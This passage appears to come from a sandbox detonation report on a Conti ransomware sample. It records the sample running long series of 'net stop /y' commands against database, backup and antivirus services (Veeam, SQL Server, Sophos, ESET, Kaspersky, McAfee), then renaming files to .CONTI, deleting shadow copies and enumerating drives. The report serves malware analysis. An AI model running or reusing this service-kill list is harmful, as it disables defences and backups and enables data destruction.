net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MySQL57 /y

C:\Windows\SysWOW64\net.exe

net stop MySQL57 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MySQL57 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ntrtscan /y

C:\Windows\SysWOW64\net.exe

net stop ntrtscan /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ntrtscan /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net.exe

net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop OracleClientCache80 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\SysWOW64\net.exe

net stop PDVFSService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop POP3Svc /y

C:\Windows\SysWOW64\net.exe

net stop POP3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop POP3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop RESvc /y

C:\Windows\SysWOW64\net.exe

net stop RESvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop RESvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sacsvr /y

C:\Windows\SysWOW64\net.exe

net stop sacsvr /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sacsvr /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SamSs /y

C:\Windows\SysWOW64\net.exe

net stop SamSs /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SamSs /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVAdminService /y

C:\Windows\SysWOW64\net.exe

net stop SAVAdminService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVAdminService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVService /y

C:\Windows\SysWOW64\net.exe

net stop SAVService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SDRSVC /y

C:\Windows\SysWOW64\net.exe

net stop SDRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SDRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SepMasterService /y

C:\Windows\SysWOW64\net.exe

net stop SepMasterService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SepMasterService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ShMonitor /y

C:\Windows\SysWOW64\net.exe

net stop ShMonitor /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ShMonitor /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Smcinst /y

C:\Windows\SysWOW64\net.exe

net stop Smcinst /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Smcinst /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SmcService /y

C:\Windows\SysWOW64\net.exe

net stop SmcService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SmcService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SMTPSvc /y

C:\Windows\SysWOW64\net.exe

net stop SMTPSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SMTPSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLBrowser /y

C:\Windows\SysWOW64\net.exe

net stop SQLBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net.exe

net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSafeOLRService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLWriter /y

C:\Windows\SysWOW64\net.exe

net stop SQLWriter /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLWriter /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBackupSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCloudSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploySvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamMountSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamRESTSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop W3Svc /y

C:\Windows\SysWOW64\net.exe

net stop W3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop W3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop WRSVC /y

C:\Windows\SysWOW64\net.exe

net stop WRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop WRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop swi_update /y

C:\Windows\SysWOW64\net.exe

net stop swi_update /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop swi_update /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop msftesql$PROD /y

C:\Windows\SysWOW64\net.exe

net stop msftesql$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop msftesql$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net.exe

net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetMsmqActivator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EhttpSrv /y

C:\Windows\SysWOW64\net.exe

net stop EhttpSrv /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EhttpSrv /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ekrn /y

C:\Windows\SysWOW64\net.exe

net stop ekrn /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ekrn /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ESHASRV /y

C:\Windows\SysWOW64\net.exe

net stop ESHASRV /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ESHASRV /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AVP /y

C:\Windows\SysWOW64\net.exe

net stop AVP /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AVP /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop klnagent /y

C:\Windows\SysWOW64\net.exe

net stop klnagent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop klnagent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfefire /y

C:\Windows\SysWOW64\net.exe

net stop mfefire /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfefire /y

Network

N/A

Files

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-28 09:27

Reported

2021-09-28 09:30

Platform

win10-en-20210920

Max time kernel

146s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe"

Signatures

Conti Ransomware

ransomware conti

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\PublishApprove.tiff => C:\Users\Admin\Pictures\PublishApprove.tiff.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SkipSplit.tiff C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File renamed C:\Users\Admin\Pictures\CheckpointPush.crw => C:\Users\Admin\Pictures\CheckpointPush.crw.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File renamed C:\Users\Admin\Pictures\SkipSplit.tiff => C:\Users\Admin\Pictures\SkipSplit.tiff.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File renamed C:\Users\Admin\Pictures\SkipDismount.crw => C:\Users\Admin\Pictures\SkipDismount.crw.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\PublishApprove.tiff C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
